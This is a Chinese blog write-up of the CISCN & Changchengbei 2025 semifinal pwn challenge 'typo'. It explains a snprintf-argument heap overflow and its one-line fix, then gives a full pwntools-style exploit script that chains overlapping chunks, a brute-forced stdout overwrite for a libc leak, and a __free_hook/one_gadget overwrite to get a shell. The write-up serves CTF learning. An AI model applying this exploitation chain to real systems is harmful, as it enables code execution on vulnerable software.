CISCN && 长城杯 2025半决赛 Pwn-typo wp(含附件)

最新推荐文章于 2025-06-05 16:37:54 发布
最新推荐文章于 2025-06-05 16:37:54 发布
阅读量969 收藏 9
点赞数 19
文章标签: 网络 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/XiDPPython/article/details/146384414
版权

通过网盘分享的文件:2025CISCN半决赛pwn.rar
链接: https://pan.baidu.com/s/1jplAyW7_0UnTWql9f6YJ7w 提取码: xidp

type

fix

通过动态调试和静态分析我们大致可以确定漏洞存在于edit
![[Pasted image 20250319173458.png]]

动态调试的时候通过输入大量的数据最终发现堆溢出漏洞,并确定漏洞是由snprint函数引发

      memset(s, 0, 0x100uLL);
      read(0, s, 0x100uLL);
      snprintf(chunk_list[idx], "%lu", s, 8LL);

我们将鼠标移动到snprintf函数上查看它的参数
我们发现它第二个参数应该是控制输入数量的参数,但是却错误的使用了%lu因此导致了漏洞的发生
![[Pasted image 20250319173807.png]]

所以我们修复的时候只需要将参数正确归位即可,修复方法如下:
![[Pasted image 20250319174049.png]]

![[Pasted image 20250319174100.png]]

break

这里据说snprintf是有格式化字符串漏洞的,但是我尝试之后实在是不知道咋使用,但是光靠堆溢出漏洞就可以打通了,所以我也不过多纠结了

思路过程:

程序使用libc为2.31版本,我们的主要思路应该是利用 tcachebin 去控制malloc_hook/free_hook ,但是程序中没有show的功能因此我们没办法直接泄露libc地址,但是通过观察题目我们可以知道在edit有很多puts函数这就可以让我们想到了利用main_arena爆破去申请到stdout,然后利用stdout来泄露libc地址

  1. 利用堆溢出修改size位制造堆块重叠并释放掉其中一个使其进入 tcachebin 中(称其为A),形成类似UAF的效果
  2. 修改原本放入 tcachebin 的那个堆块的size,,将对应size的 tcachebin 填满 再次释放它使得它进入 unosortbined 中,这样原本在 tcachebin 中的那个块的指针就会指向 main_arena 旁边了
  3. 我们知道stdoutmain_arena的后3位是固定的,那么我们只需要利用堆溢出修改 mian_arena的倒数第四位,我们有1/16的概率得到stdout的真实地址-0x10
  4. 我们成功申请到stdout之后就可以修改flagsfbad1800,覆盖_IO_write_base的尾字节为\x00泄露libc地址
  5. 后面就是正常打malloc_hook
from xidp import *

#---------------------初始化--------------

arch = 64
elf_os = 'linux'
challenge = "./pwn3"
libc_path = '/home/xidp/tools/glibc-all-in-one/libs/2.31-0ubuntu9.17_amd64/libc-2.31.so'
ip = ''
# 1-远程 其他-本地
link = 2
io, elf, libc = loadfile(challenge, libc_path, ip, arch, elf_os, link)

debug(0)            # 其他-debug   1-info

#---------------------初始化-----------

#---------------------debug-----------
# 断点
bps = [0x1698]

#---------------------debug-----------

menu = ">> "  
def add(idx, size):  
    sdla(menu, str(1))  
    sdla("Index: ", str(idx))  
    sdla("Size: ", str(size))  
def edit(idx, size, content = b'\x00'):  
    sdla(menu, str(3))  
    sdla("Index: ", str(idx))  
    sda("New size of content: ", size)  
    sda("What do you want to say: ", content)  
def free(idx):  
    sdla(menu, str(2))  
    sdla("Index: ", str(idx))  
def exit():  
    sdla(menu, str(4))  

#---------------------debug--------------

for i in range(0, 7):
    add(i, 0xf0)
add(7, 0x20)
add(8, 0xf0)
add(9, 0x60)
add(10, 0xf0)

for i in range(0, 7):
    free(i)

free(8) # 放入unsortedbin中
edit(7, b'a'*0x28+p64(0x171), b'\x00')
edit(9, b'a'*0x68+p64(0x100), b'\x00'*0x58+p64(0x100+0x70))
free(10) # chunk8-chunk10都被合并到top_chunk中

for i in range(0, 7):
    add(i, 0xf0)
add(12, 0x90)
add(8, 0x50)
add(10, 0xf0) # chunk9 和 chunk10 是同一个 chunk
add(11, 0x20) # 填充

add(13, 0x50)
for i in range(0, 7):
    free(i)
add(0, 0x40)
add(1, 0x40)
add(2, 0x40)
edit(8, b'a'*0x58 + p64(0x61), b'\x00')
free(13)
free(9)
edit(8, b'a'*0x58 + p64(0x101), b'\x00')
free(10)

# 构成一个chunk的重叠
# 想办法构成一个chunk处于tcachebins中的0x60
# 然后想办法修改chunk_size为其他比如0x100
# 然后再次释放chunk让其进入unsortedbin中

# edit(12, b'%p'*0x11+b'a'*10, b'\x00')
edit(12, b'a'*166, b'\x00')
# 这里为什么是166?
# 这里的166恰好可以将下面的chunk8的old_chunk_size覆盖为一个不大不小的数 0x0000006161616161 太大了会出问题(如果全覆盖的话read好像字节数太多了读取不了)
# 会导致这里的\x90\x26无法写入
# 需要把chunk8的人工size填充为一个大小合理的值,否则太大了read读取不了,太小了又不够覆盖
edit(8, b'11111', b'b'*0x58+b'\x90\x26')
add(13, 0x50)
add(14, 0x50)

edit(14, b'\xff'*8, b'\x00'*8 + p32(0xFBAD1800) + b'\x00'*(0x25-8))
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x1ec980
leak('libc_base')
free_hook = libc_base + libc.sym['__free_hook']
malloc_hook = libc_base + libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']
one = [0xe3afe, 0xe3b01, 0xe3b04, 0x1077ca, 0x1077d2, 0x1077d7, 0x1077e1]
one_gadget = libc_base + one[1]
leak('free_hook')
leak('malloc_hook')
leak('system_addr')
leak('one_gadget')

free(2)
free(1)
edit(0, b'a'*0x50 + p64(free_hook-0x10), b'a')
add(1, 0x40)
add(2, 0x40)

edit(2, b'1'*0x10 + p64(one_gadget), b'a')
free(0)

# pwndbg(1, bps, 1)
# x/30gx $rebase(0x4060)

ia()

protobuf

fix

有空复现之后再更新吧…咕咕咕…

参考:
1.ciscn & 长城杯 2025半决赛 pwn typo-优快云博客
2.2025 CISCN&CCB Half-Final WP
3.CISCN 2025 半决赛 writeup by 0psu3

XiDP
关注
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1018
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
ciscn&长城杯 初赛 2025 pwn anote&novel1
YX-hueimie
12-16 2215
这次比赛看得出来,出题人很喜欢c++难度分配很不合理,本来说是4道题,结果上了6道,临时改规则也是厉害。按6道来说应该是2道难,2-3道中,1-2道简,但实际上是4道难,1道中,1道简,导致好多人做完简单题就开始坐牢了。3道iot题,还是后面放的,其中2道没人做,还有一道就2个人做出来了,感觉不像是给大学生出的,iot一般在企业中用的比较多,或者是出成48小时的赛题比较合理。vm没学就没做只做了两道,novel1拿了个三血,也算是稍微给学校加了点名气。
ciscn & 长城杯 2025半决赛 pwn typo
little_hamst3r的博客
03-17 1468
ciscn & 长城杯 2025半决赛 pwn typo 题解,可惜是赛后出的,我还是写的太慢了(比赛期间就 fix 了一下),由于进行了一定的爆破,本脚本的成功率大概 1/16。
第一届长城杯半决赛wp和AWD笔记
qq_74806534的博客
04-25 3529
网站备份文件泄露可能造成的危害:1. 网站存在备份文件:网站存在备份文件,例如数据库备份文件、网站源码备份文件等,攻击者利用该信息可以更容易得到网站权限,导致网站被黑。2. 敏感文件泄露是高危漏洞之一,敏感文件包括数据库配置信息,网站后台路径,物理路径泄露等,此漏洞可以帮助攻击者进一步攻击,敞开系统的大门。3. 由于目标备份文件较大(xxx.G),可能存在更多敏感数据泄露4. 该备份文件被下载后,可以被用来做代码审计,进而造成更大的危害。
2024-长城杯-wp
m0_73889365的博客
02-18 908
CTF 比赛wp
第一届长城杯 第三赛区 半决赛 AWD 源码
04-23
第一届长城杯 第三赛区 半决赛 AWD 源码
长城杯线下赛赛后复现
fmyyy1的博客
10-14 1633
长城杯线下赛赛后复现 前言 去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。 fancyapi 目录结构 逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。 看看backend.go func Flag(w http.ResponseWriter, r *http.Request ) { action:= r.URL.Query().Get("action") if action == "" { fail(w,
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.youkuaiyun.com/A951860555/article/details/110350773
PWN-shellcode-WP- ()题目文件.rar
03-29
为几道搜集的真题,https://blog.youkuaiyun.com/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
网鼎杯2020半决赛awdplus题目
12-07
"网鼎杯2020半决赛awdplus题目"是一个针对网络安全竞赛的专题,主要涉及的是Pwn(破解)和Web(网页安全)两类挑战。这类比赛通常旨在测试参赛者的逆向工程、代码审计、漏洞利用以及网络攻防技能。下面我们将详细...
国赛ciscn2024-WP-re2-androidso-re(unidbg模拟执行Native层方法)
05-21
国赛ciscn2024-WP-re2-androidso_re(unidbg模拟执行Native层方法)
2025CISCN半决赛 ISW阶段应急响应
FakoZz的博客
03-20 782
再进去看可以看到指向了/lib/modules/5.4.0-84-generic/kernel/drivers/system/system-upgrade.ko。、查找题目3中持久化程序(下载者)的植入痕迹,计算持久化程序植入时的原始名称md5(仅计算文件名称字符串md5),提交对应flag{md5}、找出主机上加载远控木马的持久化程序(下载者),其功能为下载执行远控木马,计算该文件的md5,结果提交形式:flag{md5}分析/lib/system/systemd-agentd。
java UDP 模板
wu_android的博客
06-05 906
UDP(User Datagram Protocol)是一种无连接的传输层协议,在 Java 中可以使用 UDP 进行网络编程。
APM32芯得 EP.07 | 探索使用以太网(ETH),搭建一个简单的本地HTTP服务器
cheukyau的博客
06-03 678
本文分享基于APM32系列芯片的ETH模HTTP服务实现方法。文章详细介绍了HTTP协议特点、LWIP1.4.1的轻量级HTTP服务实现,以及嵌入式Web服务器搭建步骤:1)移植LWIP库;2)使用makefsdata工具转换HTML文件;3)编写httpd_cgi_ssi.c实现SSI和CGI功能,包括ADC数据采集和LED控制;4)配置开发板静态IP地址。实验现象展示了通过网页访问开发板IP地址,实现LED控制和ADC数据采集功能。
仓颉语言---Socket编程
w_zero_one的博客
06-02 991
Socket(套接字)可以被理解为网络上两个进程之间通信的端点。它是网络通信的抽象表示,封装了底层网络协议的复杂性,为应用程序提供了一个简单统一的接口。Socket 编程是一种网络编程范式,它允许不同计算机上的进程通过网络进行通信。这种通信可以发生在同一设备上的不同进程之间,也可以发生在不同地理置的设备之间。Socket 编程提供了一种标准的方式来实现网络通信,是构建各种网络应用的基础。
网络通信核心概念全解析:从IP地址到TCP/UDP实战
最新发布
ZNing_1的博客
06-05 978
解析网络通信三要素(IP地址、端口号、协议)与TCP/IP五层模型,对比TCP/UDP特性,演示Socket编程实战,探讨数据封装/解封装流程及性能优化方案(粘包处理、高发)。理解网络基础架构,构建高效稳定的通信应用。
【计算机网络】第七章 运输层
wuyufei_sun的博客
06-03 663
物理层、数据链路层和网络层,共同解决了将主机通过异构网络互联起来所面临的问题,实现了在计算机网络中实际进行通信的真正实体,是于通信两端主机中的进程如何为运行在提供直接的逻辑通信服务,就是运输层的主要任务。运输层协议又称为端到端协议。
网鼎杯2020半决赛awdplus题目解析与密码获取
标题“网鼎杯2020半决赛awdplus题目”指的是一个网络安全竞赛中的CTF(Capture The Flag)比赛,名为“网鼎杯”的2020年半决赛,其中的AWD(Attack With Defense)环节中的pwn(一种需要攻击者利用二进制程序漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值